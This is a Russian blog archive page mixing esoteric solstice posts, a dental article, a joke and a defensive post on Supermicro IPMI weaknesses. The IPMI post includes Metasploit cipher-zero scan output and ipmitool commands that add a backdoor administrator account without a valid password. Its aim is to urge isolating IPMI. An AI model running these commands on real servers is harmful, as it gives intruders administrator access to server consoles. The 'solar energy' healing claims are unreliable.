Архив автора: admin

С Днем Солнца и праздником Летнего Солнцестояния!

с Днем Летнего Солнцестояния!

Поздравляем Вас с Днем Солнца, праздником Летнего Солнцестояния!

Пусть этот день принесет Вам солнечное настроение, наполнит солнечным светом 

и энергией ваше тело, принесет Вам Радость, Любовь, Процветание и Изобилие!

Используйте мощные энергии сегодняшнего дня себе на благо!

Замедлитесь на минуту сейчас и почувствуйте Солнышко, его тепло и свет на своем лице… ощутите как оно светит на Вас и приятно и нежно своими лучиками гладит ваше лицо, как наполняет теплом и энергией каждую вашу клеточку, как Вы впитываете его свет, становясь чище, прозрачнее, светлее … и вот Вы начинаете внутри себя ощущать прилив любви и ваше сердце раскрывается и из него льется световой поток солнечной энергии, который пройдя через Вас, наполнив Вас, выплеснулся наружу в мир…

Читать

5 Мощных Практик на день Летнего Солнцестояния

солнечная жизнь!День Летнего Солнцестояния обладает очень мощной энергетикой, поэтому необходимо использовать энергии этого дня себе на благо за счет выполнения полезных и действенных Практик.

Как же лучше  провести летнее солнцестояние, чтобы внести в свою жизнь волшебные и целительные изменения?!

Вы можете начать свой день с небольшой практики «Наполнение Солнечной энергией».

Читать

IPMI и безопасность

В IPMI Supermicro обнаружена серьезная проблема с безопасностью. Оказалось, что в файле PSBlock хранятся пароли в открытом виде (причина — в спецификации IPMI 2.0), а сам файл можно легко получить простым GET запросом через порт 49152. Уязвимость присутствует во всех платах Supermicro, использующих BMC Nuvoton WPCM450. Что делать?
Временное решение — отключить UPnP, убив соответствующие сервисы. Но при перезагрузке BMC UPnP будет снова запущен.
Если вы по какой-то странной причине просто взяли и выставили IPMI в интернет, то самое время перестать это делать. Как и любой интерфейс управления IPMI должен находится в отдельной сети, наружных доступ — только через VPN. Относитесь к IPMI любого вендора, как к заведомо небезопасному интерфейсу, который позволит злоумышленнику получить доступ к консоли сервера.
Помимо вчерашней уязвимости с PSBlock, есть еще обширный список давно известных уязвимостей, закрытых в последних прошивках. Описание есть на Rapid7:

Cipher 0. Самая скандальная уязвимость, связанная с изначальной ошибкой в спецификации IPMI 2.0. На запрос клиента об использовании нешифрованной передачи данных IPMI позволяет получить доступ без пароля. Вот пример того, что получилось в сети клиента (несколько серверов с платами X8 и X9) после сканирования из Metasploit shell:

msf exploit(libupnp_ssdp_overflow) > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(ipmi_cipher_zero) > run

[*] Sending IPMI requests to 192.168.1.0->192.168.1.255 (256 hosts)
[+] 192.168.1.32:623 — IPMI — VULNERABLE: Accepted a session open request for cipher zero
[+] 192.168.1.71:623 — IPMI — VULNERABLE: Accepted a session open request for cipher zero
[+] 192.168.1.219:623 — IPMI — VULNERABLE: Accepted a session open request for cipher zero
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Получаем список пользователей:

ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user list
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
2   ADMIN            false   false      true       ADMINISTRATOR

Добавляем пользователя с ID=3 и администраторскими правами:

ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user set name 3 quartz
ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user set password 3 Q123q
ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user priv 3 4
ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user enable 3

Получаем доступ:

IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval. Снова проблема в спецификации IPMI 2.0, которая приводит к курьезу: система без всякой авторизации просто отдает хэш пароля. Можно забрать хэши и заняться брутфорсом при помощи какого-нибудь JohnTheRipper.
Есть еще куча дыр: UPnP, анонимный доступ (пользователь с пустым именем), локальный доступ из ОС хоста без авторизации… Уязвимости закрываются в новых прошивках IPMI, но выявляются новые.
Внимательно прочтите «IPMI Security Best Practices» и ограничьте доступ к IPMI.

Автор: Dmitry Nosachev

Лингвальная брекет система

Прекрасно, когда у человека здоровые зубы и правильный прикус. Однако многим знакомо ощущение зубной боли и мучения бессонными ночами, а также страх перед походом к стоматологу. Здоровые зубы человек не получает раз и на всю жизнь. На здоровое состояние зубов влияет образ жизни человека, правильное питание, а также наследственность. Однако бывает, что при перечисленных позитивных условиях и данных состояния зубов, с рождения имеются неправильная форма зубов или прикуса. К сожалению природа не всем дарит идеально ровные, правильной формы передние зубы, с правильным прикусом. Улыбка человека не может быть красивой, если обнаруживает далеко небезупречные, больные зубы, или неправильный прикус. В разделе современной стоматологии, ортодонтологии предлагается масса способов исправления подобных недостатков. Одним из которых является лингвальная брекет система. Эта конструкция, предназначена для того, чтобы ее устанавливали в полость рта больного, и задача ее заключается в том, чтобы на передних зубах она была незаметной. Эта новая система имеет не только внешние отличия от существующей вестибулярной системы, но и отличия в способах установки. Лингвальные брикеты имеют преимущества в том, что они отличаются не только высоким эффектом ортодонтического лечения, но и тем, что брикеты являются визуально невидимыми. Для того, чтобы установить данную брекет систему врач-ортодонт обязан тщательно подготовиться к этой непростой процедуре и хорошо изучить прикус больного. Зная все виды данных систем, врач должен составить подходящую схему для установки. Кроме этого, для того, чтобы исправить прикус, специалисту для пациента нужно обеспечить минимальную нагрузку на зубы. Данные брекет системы приобретают все большую популярность у людей, страдающих от неправильного прикуса и нежелающих показывать окружающим, что в данный момент они проходят курс исправления этого прикуса. Такие системы сегодня рекомендуется многими специалистами – ортодонтами, так как установить данную систему довольно просто, и она очень эффективна. Однако для успешной установки системы врач должен обладать специальными практическими навыками. Стоит отметить, что лингвальная брекет система изготавливается из золота, она плоская и плотно прилегает к зубам, при этом не влияет на жевательный процесс зубов. .

Отдам свое сердце в хорошие руки

девочка-ангел с сердцемИстинная любовь — это не физическая страсть и не просто романтика.

Настоящая любовь — это способность принять все — все то, что было, что есть и то, что будет…

 

— Здравствуйте, я  по объявлению. Это вы отдаёте сердце в хорошие руки?

— Я.

— Б/у?

— Да. Оно любило три года одного человека.

— Ну-у! Три года эксплуатации — это довольно большой срок! Почему отдаёте?

Читать

Принципы создания успешной жизни в Гармонии с собой и миром

успех и гармонияПредставляет вашему вниманию запись нашего практического выступления «Принципы создания успешной жизни в Гармонии с собой и с миром».

Вы сможете:

                    • Раскрыть внутренние ресурсы, силы и возможности.
                    • Получить принципы создания успешной и гармоничной жизни.
                    • Открыться потоку безусловной Любви и божественной энергии Творца.

                      • Читать